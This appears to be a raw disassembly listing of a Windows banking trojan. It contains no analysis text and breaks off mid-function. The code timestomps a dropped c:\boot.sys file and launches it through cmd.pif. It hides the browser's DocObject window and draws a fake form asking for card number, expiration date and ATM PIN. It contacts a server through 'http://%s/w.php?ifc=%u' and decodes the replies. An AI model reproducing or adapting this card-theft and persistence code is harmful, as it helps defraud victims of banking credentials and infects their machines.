cmp byte ptr [eax+ebx], 3Ah
jnz loc_4050C9
mov eax, [ebp+arg_0]
cmp byte ptr [ebx+eax+11h], 20h
jz short loc_405001
cmp byte ptr [ebx+eax+14h], 20h
jnz loc_4050C9
loc_405001: ; CODE XREF: sub_404FCE+26�j
mov eax, [ebp+arg_0]
mov al, [ebx+eax+1]
cmp al, 34h
jz short loc_405014
cmp al, 35h
jnz loc_4050C9
loc_405014: ; CODE XREF: sub_404FCE+3C�j
mov eax, [ebp+arg_0]
cmp byte ptr [ebx+eax+11h], 20h
jnz short loc_405027
mov [ebp+var_4], 10h
jmp short loc_40502E
; ---------------------------------------------------------------------------
loc_405027: ; CODE XREF: sub_404FCE+4E�j
mov [ebp+var_4], 13h
loc_40502E: ; CODE XREF: sub_404FCE+57�j
mov [ebp+var_5], 0
xor esi, esi
jmp short loc_4050A7
; ---------------------------------------------------------------------------
loc_405036: ; CODE XREF: sub_404FCE+DC�j
cmp [ebp+var_4], 13h
jnz short loc_405079
lea eax, [ebx+esi+1]
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 2Dh
jnz short loc_405079
mov edi, 5
mov edx, esi
inc edx
mov [ebp+var_18], edx
mov [ebp+var_10], edi
mov eax, edx
mov [ebp+var_14], eax
mov ecx, edi
xor edx, edx
div ecx
mov [ebp+var_1C], eax
mov eax, edi
mov edi, [ebp+var_1C]
mul [ebp+var_1C]
mov [ebp+var_20], eax
mov edi, [ebp+var_18]
mov edx, eax
cmp edx, edi
jz short loc_4050A6
loc_405079: ; CODE XREF: sub_404FCE+6C�j
; sub_404FCE+79�j
lea eax, [ebx+esi+1]
mov edx, [ebp+arg_0]
mov al, [edx+eax]
cmp al, 30h
jl short loc_40508B
cmp al, 39h
jle short loc_40508D
loc_40508B: ; CODE XREF: sub_404FCE+B7�j
jmp short loc_4050C9
; ---------------------------------------------------------------------------
loc_40508D: ; CODE XREF: sub_404FCE+BB�j
movzx eax, [ebp+var_5]
lea edx, [ebx+esi+1]
mov ecx, [ebp+arg_0]
mov dl, [ecx+edx]
mov ds:byte_419260[eax], dl
add [ebp+var_5], 1
loc_4050A6: ; CODE XREF: sub_404FCE+A9�j
inc esi
loc_4050A7: ; CODE XREF: sub_404FCE+66�j
cmp esi, [ebp+var_4]
jb short loc_405036
mov eax, [ebp+var_4]
mov ds:byte_419260[eax], 0
call sub_40129C
or eax, eax
jnz short loc_4050C9
mov [ebp+var_C], 1
jmp short loc_40511B
; ---------------------------------------------------------------------------
loc_4050C9: ; CODE XREF: sub_404FCE+18�j
; sub_404FCE+2D�j ...
inc ebx
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 0
jz short loc_405117
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 3Ch
jnz loc_404FDF
cmp byte ptr [ebx+eax+1], 46h
jnz loc_404FDF
cmp byte ptr [ebx+eax+2], 4Fh
jnz loc_404FDF
cmp byte ptr [ebx+eax+3], 52h
jnz loc_404FDF
cmp byte ptr [ebx+eax+4], 4Dh
jnz loc_404FDF
cmp byte ptr [ebx+eax+5], 5Fh
jnz loc_404FDF
loc_405117: ; CODE XREF: sub_404FCE+103�j
and [ebp+var_C], 0
loc_40511B: ; CODE XREF: sub_404FCE+F9�j
cmp [ebp+var_C], 0
jz short loc_40512D
mov eax, ds:dword_419134
mov dword_41A1F4, eax
jmp short loc_405195
; ---------------------------------------------------------------------------
loc_40512D: ; CODE XREF: sub_404FCE+151�j
push 0
push 0
push 4
push 0
push 0
push 40000000h
push offset dword_408010
call sub_407A8C ; CreateFileA
mov [ebp+var_10], eax
push 2
push 0
push 0
push eax
call sub_407ABC ; SetFilePointer
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_40515D: ; CODE XREF: sub_404FCE+194�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40515D
mov edi, eax
push 0
lea edx, [ebp+var_14]
push edx
push edi
push [ebp+arg_0]
push [ebp+var_10]
call sub_407B40 ; WriteFile
push 0
lea eax, [ebp+var_14]
push eax
push 2
push offset asc_424CEC ; "\r\n"
push [ebp+var_10]
call sub_407B40 ; WriteFile
push [ebp+var_10]
call sub_407984 ; CloseHandle
loc_405195: ; CODE XREF: sub_404FCE+15D�j
pop edi
pop esi
pop ebx
leave
retn
sub_404FCE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40519A proc near ; CODE XREF: sub_40523F+66�p
var_222 = byte ptr -222h
var_21A = byte ptr -21Ah
var_212 = byte ptr -212h
var_20A = byte ptr -20Ah
var_105 = byte ptr -105h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 224h
push edi
push 104h
lea eax, [ebp+var_20A]
push eax
call sub_40799C ; GetSystemDirectoryA
lea eax, [ebp+var_20A]
push eax
lea eax, [ebp+var_105]
push eax
call sub_4078EC
push offset aKernel32_dll_0 ; "\\kernel32.dll"
lea eax, [ebp+var_105]
push eax
call sub_407E64
add esp, 8
push 0
push 0
push 3
push 0
push 0
push 80000001h
lea eax, [ebp+var_105]
push eax
call sub_407A8C ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_40523C
lea eax, [ebp+var_222]
push eax
lea eax, [ebp+var_21A]
push eax
lea eax, [ebp+var_212]
push eax
push edi
call sub_407960 ; GetFileTime
lea eax, [ebp+var_222]
push eax
lea eax, [ebp+var_21A]
push eax
lea eax, [ebp+var_212]
push eax
push [ebp+arg_0]
call sub_407AC8 ; SetFileTime
push edi
call sub_407984 ; CloseHandle
loc_40523C: ; CODE XREF: sub_40519A+62�j
pop edi
leave
retn
sub_40519A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40523F proc near ; CODE XREF: sub_406344+58�p
var_218 = byte ptr -218h
var_214 = byte ptr -214h
var_110 = byte ptr -110h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 218h
push ebx
push esi
push edi
call sub_4079C0 ; DATA XREF: sub_41E375�r
loc_405250: ; DATA XREF: sub_41E381�r sub_41E38D�r
cmp eax, 80000000h
jnb loc_405307 ; DATA XREF: sub_41E399�r
lea edi, [ebp+var_110] ; DATA XREF: sub_41E3A5�r
; sub_41E3B1�r
lea esi, aCBoot_sys ; DATA XREF: sub_41E3BD�r
; "c:\\boot.sys"
mov ecx, 3 ; DATA XREF: sub_41E3C9�r
loc_40526C: ; DATA XREF: sub_41E3D5�r
rep movsd
push 0
loc_405270: ; DATA XREF: sub_41E3E1�r
push 0
push 2
loc_405274: ; DATA XREF: sub_41E3ED�r
push 0
push 0
loc_405278: ; DATA XREF: sub_41E3F9�r sub_41E405�r
push 40000000h
lea eax, [ebp+var_110] ; DATA XREF: sub_41E411�r
push eax
loc_405284: ; DATA XREF: sub_41E41D�r
call sub_407A8C ; CreateFileA
mov ebx, eax
push 0
lea eax, [ebp+var_218] ; DATA XREF: sub_41E429�r
push eax
push 4001h
push offset word_42002A ; DATA XREF: sub_41E435�r
push ebx
call sub_407B40 ; WriteFile
push ebx
call sub_40519A ; DATA XREF: sub_41E4F1�r
push ebx
call sub_407984 ; DATA XREF: sub_41E4FD�r
loc_4052B0: ; DATA XREF: sub_41E509�r sub_41E515�r
push 104h
lea eax, [ebp+var_104] ; DATA XREF: sub_41E521�r
push eax
loc_4052BC: ; DATA XREF: sub_41E52D�r sub_41E539�r
call sub_40799C ; GetSystemDirectoryA
lea eax, [ebp+var_104] ; DATA XREF: sub_41E545�r
push eax
loc_4052C8: ; DATA XREF: sub_41E551�r sub_41E55D�r
push offset aSCmd_pif ; "%s\\cmd.pif"
lea eax, [ebp+var_214] ; DATA XREF: sub_41E569�r
push eax
loc_4052D4: ; DATA XREF: sub_41E575�r sub_41E581�r
call sub_407E40
push offset aCmd_exeCStartC ; DATA XREF: sub_41E58D�r
; "\\cmd.exe /C start c:\\boot.sys"
lea eax, [ebp+var_104] ; DATA XREF: sub_41E599�r
loc_4052E4: ; DATA XREF: sub_41E5A5�r
push eax
call sub_407E64 ; DATA XREF: sub_41E5B1�r
add esp, 18h ; DATA XREF: sub_41E5BD�r
lea eax, [ebp+var_214] ; DATA XREF: sub_41E5C9�r
push eax
loc_4052F4: ; DATA XREF: sub_41E5D5�r sub_41E5E1�r
call sub_407B70 ; DeleteFileA
push 0
lea eax, [ebp+var_104]
push eax
call sub_407B34 ; DATA XREF: sub_41E5ED�r
loc_405307: ; CODE XREF: sub_40523F+16�j
pop edi
loc_405308: ; DATA XREF: sub_41E5F9�r
pop esi
pop ebx
leave
retn
sub_40523F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40530C proc near ; CODE XREF: sub_405350:loc_405370�p
; DATA XREF: sub_41E605�r
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 4 ; DATA XREF: sub_41E611�r
push 1000h ; DATA XREF: sub_41E61D�r
push [ebp+arg_0] ; DATA XREF: sub_41E629�r
push 0
call sub_407AF8 ; DATA XREF: sub_41E635�r
loc_405320: ; DATA XREF: sub_41E641�r
pop ebp
retn
sub_40530C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405322 proc near ; CODE XREF: sub_405350+87�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp ; DATA XREF: sub_41E64D�r
push 8000h
push 0
push [ebp+arg_0]
call sub_407B04 ; DATA XREF: sub_41E659�r
loc_405334: ; DATA XREF: sub_41E665�r
pop ebp
retn
sub_405322 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405336 proc near ; CODE XREF: sub_405350+93�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp ; DATA XREF: sub_41E671�r
push offset dword_424078 ; DATA XREF: sub_41E67D�r
push offset dword_424038 ; DATA XREF: sub_41E689�r
push [ebp+arg_4] ; DATA XREF: sub_41E695�r
push [ebp+arg_0] ; DATA XREF: sub_41E6A1�r
call sub_406E94 ; DATA XREF: sub_41E6AD�r
pop ebp
retn
sub_405336 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405350 proc near ; CODE XREF: sub_405AAC+27E�p
; DATA XREF: sub_41E6B9�r
var_54 = byte ptr -54h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 54h ; DATA XREF: sub_41E6C5�r
push ebx
push esi
loc_405358: ; DATA XREF: sub_41E6D1�r
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_405367
loc_405364: ; DATA XREF: sub_41E6DD�r
add eax, 3Fh
loc_405367: ; CODE XREF: sub_405350+12�j
; DATA XREF: sub_41E6E9�r
sar eax, 6
mov edi, eax
loc_40536C: ; DATA XREF: sub_41E6F5�r
shl edi, 6
push edi
loc_405370: ; DATA XREF: sub_41E701�r sub_41E70D�r
call sub_40530C
pop ecx
mov [ebp+var_14], eax ; DATA XREF: sub_41E719�r
mov eax, [ebp+arg_4]
loc_40537C: ; DATA XREF: sub_41E725�r
add eax, 40h
jge short loc_405384 ; DATA XREF: sub_41E731�r
add eax, 3Fh
loc_405384: ; CODE XREF: sub_405350+2F�j
; DATA XREF: sub_41E73D�r
sar eax, 6
mov edi, eax ; DATA XREF: sub_41E749�r
shl edi, 6
loc_40538C: ; DATA XREF: sub_41E755�r
push edi
push [ebp+var_14]
loc_405390: ; DATA XREF: sub_41E761�r sub_41E76D�r
call sub_407AB0 ; RtlZeroMemory
push [ebp+arg_4]
loc_405398: ; DATA XREF: sub_41E779�r
push esi
push [ebp+var_14]
call sub_407E04
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
call sub_406FD2
mov esi, [ebp+var_14]
xor ebx, ebx
jmp short loc_4053C2
; ---------------------------------------------------------------------------
loc_4053B4: ; CODE XREF: sub_405350+82�j
push esi
lea eax, [ebp+var_10]
push eax
call sub_406FF9
add esi, 40h
inc ebx
loc_4053C2: ; CODE XREF: sub_405350+62�j
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_4053CD
add eax, 3Fh
loc_4053CD: ; CODE XREF: sub_405350+78�j
sar eax, 6
cmp ebx, eax
jl short loc_4053B4
push [ebp+var_14]
call sub_405322
lea eax, [ebp+var_54]
push eax
push [ebp+arg_8]
call sub_405336
push 10h
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
call sub_407DF8
add esp, 18h
or eax, eax
jz short loc_405403
xor eax, eax
inc eax
jmp short loc_405405
; ---------------------------------------------------------------------------
loc_405403: ; CODE XREF: sub_405350+AC�j
xor eax, eax
loc_405405: ; CODE XREF: sub_405350+B1�j
pop edi
pop esi
pop ebx
leave
retn
sub_405350 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40540A proc near ; CODE XREF: sub_405AAC+1F6�p
; sub_405AAC+20E�p
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
and [ebp+var_8], 0
and [ebp+var_C], 0
xor esi, esi
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_8]
add eax, ebx
mov [ebp+var_4], eax
mov edi, [ebp+arg_0]
jmp loc_4054BB
; ---------------------------------------------------------------------------
loc_405430: ; CODE XREF: sub_40540A+B9�j
movsx edx, byte ptr [edi]
shl edx, 2
mov esi, dword_4240B8[edx]
cmp esi, 0FFFFFFFFh
jz short loc_4054BA
mov eax, [ebp+var_8]
or eax, eax
jl short loc_4054B7
cmp eax, 3
jg short loc_4054B7
jmp off_4244B8[eax*4]
loc_405455: ; DATA XREF: .data:off_4244B8�o
inc [ebp+var_8]
jmp short loc_4054B7
; ---------------------------------------------------------------------------
loc_40545A: ; CODE XREF: sub_40540A+44�j
; DATA XREF: .data:004244BC�o
mov edx, [ebp+var_C]
shl edx, 2
mov ecx, esi
and ecx, 30h
sar ecx, 4
or edx, ecx
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
inc [ebp+var_8]
jmp short loc_4054B7
; ---------------------------------------------------------------------------
loc_40547A: ; CODE XREF: sub_40540A+44�j
; DATA XREF: .data:004244C0�o
mov edx, [ebp+var_C]
and edx, 0Fh
shl edx, 4
mov ecx, esi
and ecx, 3Ch
sar ecx, 2
or edx, ecx
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
inc [ebp+var_8]
jmp short loc_4054B7
; ---------------------------------------------------------------------------
loc_40549D: ; CODE XREF: sub_40540A+44�j
; DATA XREF: .data:004244C4�o
mov edx, [ebp+var_C]
and edx, 3
shl edx, 6
or edx, esi
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
and [ebp+var_8], 0
loc_4054B7: ; CODE XREF: sub_40540A+3D�j
; sub_40540A+42�j ...
mov [ebp+var_C], esi
loc_4054BA: ; CODE XREF: sub_40540A+36�j
inc edi
loc_4054BB: ; CODE XREF: sub_40540A+21�j
cmp byte ptr [edi], 0
jz short loc_4054C9
cmp ebx, [ebp+var_4]
jb loc_405430
loc_4054C9: ; CODE XREF: sub_40540A+B4�j
cmp byte ptr [edi], 0
jnz short loc_4054D5
mov eax, ebx
sub eax, [ebp+arg_4]
jmp short loc_4054D8
; ---------------------------------------------------------------------------
loc_4054D5: ; CODE XREF: sub_40540A+C2�j
or eax, 0FFFFFFFFh
loc_4054D8: ; CODE XREF: sub_40540A+C9�j
pop edi
pop esi
pop ebx
leave
retn
sub_40540A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4054DD proc near ; CODE XREF: sub_40553F+13�p
; sub_40553F+20�p ...
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_4078CC
push edi
push 5
push [ebp+arg_0]
call sub_407BA0 ; GetWindow
mov edi, eax
loc_4054F7: ; CODE XREF: sub_4054DD+5D�j
or edi, edi
jnz short loc_4054FF
xor eax, eax
jmp short loc_40553C
; ---------------------------------------------------------------------------
loc_4054FF: ; CODE XREF: sub_4054DD+1C�j
push 0FFFh
lea eax, [ebp+var_FFF]
push eax
push edi
call sub_407BAC ; GetClassNameA
push 1
push [ebp+arg_4]
lea eax, [ebp+var_FFF]
push eax
call sub_401429
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_405530
mov eax, edi
jmp short loc_40553C
; ---------------------------------------------------------------------------
loc_405530: ; CODE XREF: sub_4054DD+4D�j
push 2
push edi
call sub_407BA0 ; GetWindow
mov edi, eax
jmp short loc_4054F7
; ---------------------------------------------------------------------------
loc_40553C: ; CODE XREF: sub_4054DD+20�j
; sub_4054DD+51�j
pop edi
leave
retn
sub_4054DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40553F proc near ; CODE XREF: sub_4068A8+140�p
var_11C = byte ptr -11Ch
var_112 = dword ptr -112h
var_10E = dword ptr -10Eh
var_10A = dword ptr -10Ah
var_106 = dword ptr -106h
var_102 = byte ptr -102h
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push esi
push edi
push offset aDocobject ; "DocObject"
push [ebp+arg_0]
call sub_4054DD
mov edi, eax
push offset aExplorer ; "Explorer"
push edi
call sub_4054DD
add esp, 10h
mov ds:dword_408FEC, eax
push 0
push eax
call sub_407C90 ; ShowWindow
lea eax, [ebp+var_112]
push eax
push edi
call sub_407B88 ; GetWindowRect
push 0
push ds:dword_409008
push 0
push edi
mov eax, [ebp+var_106]
sub eax, [ebp+var_10E]
push eax
mov eax, [ebp+var_10A]
sub eax, [ebp+var_112]
push eax
push 0
push 0
push 50800000h
push offset byte_424E15
push offset aKkqhook ; "KKQHOOK"
push 200h
call sub_407C9C ; CreateWindowExA
mov ds:dword_409124, eax
push 0
push ds:dword_409008
push 0
push eax
push 3Ch
mov eax, [ebp+var_10A]
sub eax, [ebp+var_112]
sub eax, 64h
push eax
push 14h
push 14h
push 50800000h
push offset aAuthorizationF ; "\n Authorization Failed."
push offset aStatic ; "STATIC"
push 0
call sub_407C9C ; CreateWindowExA
mov ds:dword_408FE8, eax
push 0
push ds:dword_409008
push 0
push ds:dword_409124
push 12Ch
mov eax, [ebp+var_10A]
sub eax, [ebp+var_112]
sub eax, 64h
push eax
push 51h
push 14h
push 50800009h
push offset byte_424E15
push offset aStatic ; "STATIC"
push 0
call sub_407C9C ; CreateWindowExA
mov ds:dword_419140, eax
push 0
push 2
push 0
push 0
push 5
push 1
push 0
push 0
push 0
push 2BCh
push 0
push 0
push 8
push 14h
call sub_407D08 ; CreateFontA
mov esi, eax
push 1
push esi
push 30h
push ds:dword_408FE8
call sub_407C6C ; SendMessageA
push 0
push ds:dword_409008
push 0
push ds:dword_419140
push 12Ch
push 32h
push 3Ah
push 14h
push 50800003h
push offset byte_424E15
push offset aCombobox ; "COMBOBOX"
push 0
call sub_407C9C ; CreateWindowExA
mov ds:dword_419150, eax
push 0
push ds:dword_409008
push 0
push ds:dword_419140
push 12Ch
push 3Ch
push 3Ah
push 52h
push 50800003h
push offset byte_424E15
push offset aCombobox ; "COMBOBOX"
push 0
call sub_407C9C ; CreateWindowExA
mov ds:dword_409000, eax
mov [ebp+var_2], 1
jmp short loc_40575A
; ---------------------------------------------------------------------------
loc_4056F2: ; CODE XREF: sub_40553F+222�j
movzx eax, [ebp+var_2]
push eax
push offset a_2u ; "%.2u"
lea eax, [ebp+var_11C]
push eax
call sub_407E40
lea eax, [ebp+var_11C]
push eax
push 0
push 143h
push ds:dword_419150
call sub_407C6C ; SendMessageA
movzx eax, [ebp+var_2]
add eax, 4
push eax
push offset a20_2u ; "20%.2u"
lea eax, [ebp+var_11C]
push eax
call sub_407E40
add esp, 18h
lea eax, [ebp+var_11C]
push eax
push 0
push 143h
push ds:dword_409000
call sub_407C6C ; SendMessageA
inc [ebp+var_2]
loc_40575A: ; CODE XREF: sub_40553F+1B1�j
movzx eax, [ebp+var_2]
cmp eax, 0Dh
jl short loc_4056F2
push 0
push ds:dword_409008
push 0
push ds:dword_409124
push 10h
push 67h
push 6Eh
push 0C3h
push 50000000h
push offset aYourCardNumber ; "Your card number"
push offset aStatic ; "STATIC"
push 0
call sub_407C9C ; CreateWindowExA
mov ds:dword_408A20, eax
push 0
push ds:dword_409008
push 0
push ds:dword_409124
push 10h
push 57h
push 91h
push 0C3h
push 50000000h
push offset aExpirationDate ; "Expiration date"
push offset aStatic ; "STATIC"
push 0
call sub_407C9C ; CreateWindowExA
mov ds:dword_419148, eax
push 0
push ds:dword_409008
push 0
push ds:dword_409124
push 10h
push 56h
push 0B9h
push 0C3h
push 50000000h
push offset aAtmPinCode ; "ATM PIN-Code"
push offset aStatic ; "STATIC"
push 0
call sub_407C9C ; CreateWindowExA
mov ds:dword_419360, eax
push 0
push ds:dword_409008
push 0
push ds:dword_409124
push 10h
push 1E4h
push 0E6h
push 1Eh
push 50000000h
push offset aUnableToAuthor ; "Unable to authorize. ATM PIN-Code is re"...
push offset aStatic ; "STATIC"
push 0
call sub_407C9C ; CreateWindowExA
mov ds:dword_41914C, eax
push 0
push ds:dword_409008
push 0
push ds:dword_409124
push 10h
push 0FDh
push 0FFh
push 1Eh
push 50000000h
push offset aPleaseMakeCorr ; "Please make corrections and try again."
push offset aStatic ; "STATIC"
push 0
call sub_407C9C ; CreateWindowExA
mov ds:dword_419368, eax
push offset byte_419260
lea eax, [ebp+var_102]
push eax
call sub_407E40
add esp, 8
mov [ebp+var_3], 4
jmp short loc_4058A7
; ---------------------------------------------------------------------------
loc_405897: ; CODE XREF: sub_40553F+36D�j
movzx eax, [ebp+var_3]
mov [ebp+eax+var_102], 78h
add [ebp+var_3], 1
loc_4058A7: ; CODE XREF: sub_40553F+356�j
mov al, [ebp+var_3]
cmp al, 0Ch
jb short loc_405897
push 0
push ds:dword_409008
push 0
push ds:dword_419140
push 18h
push 82h
push 14h
push 14h
push 50800800h
lea eax, [ebp+var_102]
push eax
push offset aEdit ; "EDIT"
push 200h
call sub_407C9C ; CreateWindowExA
mov ds:dword_40861C, eax
push 0
push ds:dword_409008
push 0
push ds:dword_419140
push 18h
push 46h
push 5Fh
push 14h
push 50800000h
push offset byte_424E15
push offset aEdit ; "EDIT"
push 200h
call sub_407C9C ; CreateWindowExA
mov ds:dword_408FF8, eax
push 0
push 78h
push 0CCh
push eax
call sub_407C6C ; SendMessageA
push 0
push ds:dword_409008
push 0
push ds:dword_409124
push 17h
push 9Bh
push 140h
push 1Eh
push 50800000h
push offset aClickOnceToCon ; "Click Once To Continue"
push offset aButton ; "BUTTON"
push 0
call sub_407C9C ; CreateWindowExA
mov ds:dword_419364, eax
push 0
push 2
push 0
push 0
push 5
push 1
push 0
push 0
push 0
push 190h
push 0
push 0
push 6
push 10h
call sub_407D08 ; CreateFontA
mov edi, eax
push 1
push edi
push 30h
push ds:dword_419150
call sub_407C6C ; SendMessageA
push 1
push edi
push 30h
push ds:dword_409000
call sub_407C6C ; SendMessageA
push 1
push edi
push 30h
push ds:dword_40861C
call sub_407C6C ; SendMessageA
push 1
push edi
push 30h
push ds:dword_408FF8
call sub_407C6C ; SendMessageA
push 1
push edi
push 30h
push ds:dword_419148
call sub_407C6C ; SendMessageA
push 1
push edi
push 30h
push ds:dword_408A20
call sub_407C6C ; SendMessageA
push 1
push edi
push 30h
push ds:dword_419360
call sub_407C6C ; SendMessageA
push 1
push edi
push 30h
push ds:dword_419364
call sub_407C6C ; SendMessageA
push 0FFFFFFFCh
push ds:dword_419150
call sub_407C18 ; GetWindowLongA
mov ds:dword_409010, eax
push offset sub_4067EE
push 0FFFFFFFCh
push ds:dword_419150
call sub_407C24 ; SetWindowLongA
push 0FFFFFFFCh
push ds:dword_409000
call sub_407C18 ; GetWindowLongA
mov ds:dword_408FFC, eax
push offset sub_4067EE
push 0FFFFFFFCh
push ds:dword_409000
call sub_407C24 ; SetWindowLongA
push 0FFFFFFFCh
push ds:dword_40861C
call sub_407C18 ; GetWindowLongA
mov ds:dword_408000, eax
push offset sub_4067EE
push 0FFFFFFFCh
push ds:dword_40861C
call sub_407C24 ; SetWindowLongA
push 0FFFFFFFCh
push ds:dword_408FF8
call sub_407C18 ; GetWindowLongA
mov ds:dword_408A1C, eax
push offset sub_4067EE
push 0FFFFFFFCh
push ds:dword_408FF8
call sub_407C24 ; SetWindowLongA
push ds:dword_419150
call sub_407BB8 ; SetFocus
pop edi
pop esi
leave
retn
sub_40553F endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_405AAC proc near ; DATA XREF: sub_406344+454�o
var_556E = byte ptr -556Eh
var_4688 = dword ptr -4688h
var_4683 = byte ptr -4683h
var_4584 = byte ptr -4584h
var_4580 = dword ptr -4580h
var_457C = dword ptr -457Ch
var_4578 = dword ptr -4578h
var_4573 = byte ptr -4573h
var_456F = byte ptr -456Fh
var_3574 = dword ptr -3574h
var_3570 = dword ptr -3570h
var_356B = byte ptr -356Bh
var_256C = byte ptr -256Ch
var_2567 = byte ptr -2567h
var_1578 = dword ptr -1578h
var_1574 = dword ptr -1574h
var_156E = byte ptr -156Eh
var_156D = byte ptr -156Dh
var_111C = byte ptr -111Ch
var_1117 = byte ptr -1117h
var_1018 = dword ptr -1018h
var_1014 = dword ptr -1014h
var_1010 = dword ptr -1010h
var_100B = byte ptr -100Bh
var_F07 = byte ptr -0F07h
var_E08 = dword ptr -0E08h
var_E04 = byte ptr -0E04h
var_604 = dword ptr -604h
var_600 = byte ptr -600h
var_200 = byte ptr -200h
var_1FD = byte ptr -1FDh
var_1FB = byte ptr -1FBh
var_1A8 = byte ptr -1A8h
var_1A7 = byte ptr -1A7h
push ebp
mov ebp, esp
mov eax, 5570h
call sub_4078CC
push ebx
push esi
push edi
call sub_4079B4 ; GetTickCount
push eax
call sub_407E4C
pop ecx
loc_405AC8: ; CODE XREF: sub_405AAC+85E�j
push 8
lea eax, [ebp+var_F07]
push eax
call sub_4013E4
lea eax, [ebp+var_F07]
push eax
push offset dword_419160
push offset aSS_dat ; "%s\\%s.dat"
lea eax, [ebp+var_600]
push eax
call sub_407E40
lea eax, [ebp+var_600]
push eax
call sub_4024E0
mov edi, dword_41A0A0
push off_41A0A8[edi*4]
push offset aHttpS ; "http://%s"
lea edi, [ebp+var_E04]
push edi
call sub_407E40
push 1
push offset asc_42464A ; "/"
mov edi, dword_41A0A0
push off_41A0A8[edi*4]
call sub_401429
add esp, 34h
cmp eax, 0FFFFh
jnz short loc_405B54
push offset aW_php ; "/w.php"
lea eax, [ebp+var_E04]
push eax
call sub_407E64
add esp, 8
loc_405B54: ; CODE XREF: sub_405AAC+92�j
and [ebp+var_1014], 0
mov [ebp+var_1018], 4
lea eax, [ebp+var_111C]
push eax
lea eax, [ebp+var_1018]
push eax
lea eax, [ebp+var_1014]
push eax
push offset aIfc ; "ifc"
push offset aSoftwareMicr_3 ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_401326
push [ebp+var_1014]
push offset a?ifcU ; "?ifc=%u"
lea eax, [ebp+var_1117]
push eax
call sub_407E40
lea eax, [ebp+var_1117]
push eax
lea eax, [ebp+var_E04]
push eax
call sub_407E64
lea eax, [ebp+var_604]
push eax
push 0
push 0
push offset aQ ; "q"
push offset aKkqhook ; "KKQHOOK"
lea eax, [ebp+var_600]
push eax
lea eax, [ebp+var_E04]
push eax
push 0
call sub_403D8E
add esp, 4Ch
mov esi, eax
or esi, esi
jnz short loc_405BFD
lea eax, [ebp+var_600]
push eax
call sub_40251A
pop ecx
jmp loc_406238
; ---------------------------------------------------------------------------
loc_405BFD: ; CODE XREF: sub_405AAC+13D�j
and [ebp+var_1014], 0
push 4
push 4
lea eax, [ebp+var_1014]
push eax
push offset aIfc ; "ifc"
push offset aSoftwareMicr_3 ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_401379
push 0
lea eax, [ebp+var_600]
push eax
call sub_4014E2
add esp, 20h
mov [ebp+var_E08], eax
or eax, eax
jz loc_406238
lea eax, [ebp+var_600]
push eax
call sub_407B70 ; DeleteFileA
lea eax, [ebp+var_600]
push eax
call sub_40251A
pop ecx
xor ebx, ebx
jmp loc_40620D
; ---------------------------------------------------------------------------
loc_405C62: ; CODE XREF: sub_405AAC+77B�j
cmp [ebp+var_200], 0
jz loc_40620D
lea ecx, [ebp+var_200]
or eax, 0FFFFFFFFh
loc_405C78: ; CODE XREF: sub_405AAC+1D1�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_405C78
cmp eax, 5Ch
jb loc_40620D
mov [ebp+var_1A8], 0
push 0FFFh
lea eax, [ebp+var_256C]
push eax
lea eax, [ebp+var_1A7]
push eax
call sub_40540A
push 0FFFh
lea eax, [ebp+var_356B]
push eax
lea eax, [ebp+var_200]
push eax
call sub_40540A
add esp, 18h
mov [ebp+var_156E], 0
mov [ebp+var_156D], 0
jmp short loc_405CF0
; ---------------------------------------------------------------------------
loc_405CD2: ; CODE XREF: sub_405AAC+25D�j
movzx eax, [ebp+var_156D]
lea edx, [ebp+eax+var_256C]
movsx ecx, byte ptr [edx]
sub ecx, eax
mov eax, ecx
mov [edx], al
add [ebp+var_156D], 1
loc_405CF0: ; CODE XREF: sub_405AAC+224�j
lea ecx, [ebp+var_256C]
or eax, 0FFFFFFFFh
loc_405CF9: ; CODE XREF: sub_405AAC+252�j
inc eax
